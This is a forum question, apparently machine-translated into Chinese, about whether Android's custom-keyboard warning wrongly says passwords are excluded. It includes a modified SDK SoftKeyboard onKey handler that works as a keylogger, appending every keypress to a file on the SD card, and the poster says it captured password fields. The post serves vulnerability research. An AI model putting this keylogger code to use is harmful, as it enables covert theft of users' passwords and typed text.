3
我一直在研究Android自定义键盘的安全漏洞,并注意到一些有趣的事情。当我在我的夏普Aquos姜饼手机上安装键盘时,它告诉我它可能能够收集您输入的所有文本,包括密码,包括。但是,在我运行ICS的Samsung Galaxy Tab 2上,它显示“,除了密码”。Android自定义键盘密码记录
我决定测试,并修改了SoftKeyboard的Android SDK样本包括一个键盘记录器,写入SD卡,使其更容易从其他应用程序访问:
public void onKey(int primaryCode, int[] keyCodes) {
String keypress = String.valueOf((char)primaryCode);
Log.d("Key Pressed",keypress);
try{
String SDCARD = Environment.getExternalStorageDirectory().getAbsolutePath();
String FILENAME = "keylogger.txt";
File outfile = new File(SDCARD+File.separator+FILENAME);
FileOutputStream fos = new FileOutputStream(outfile,true);
fos.write(keypress.getBytes());
fos.close();
}catch(Exception e) {
Log.d("EXCEPTION",e.getMessage());
}
我能够登录该文本,即使在HTML密码字段中。
所以,我的银河标签上的消息似乎是不正确的/误导。
这是所有ICS设备上的相同消息,还是Samsung已更改了股票Android版本的消息?有人知道为什么它说“除密码”,当他们很容易登录?
下面是Galaxy Tab的警告消息:http://yfrog.com/hs57709775j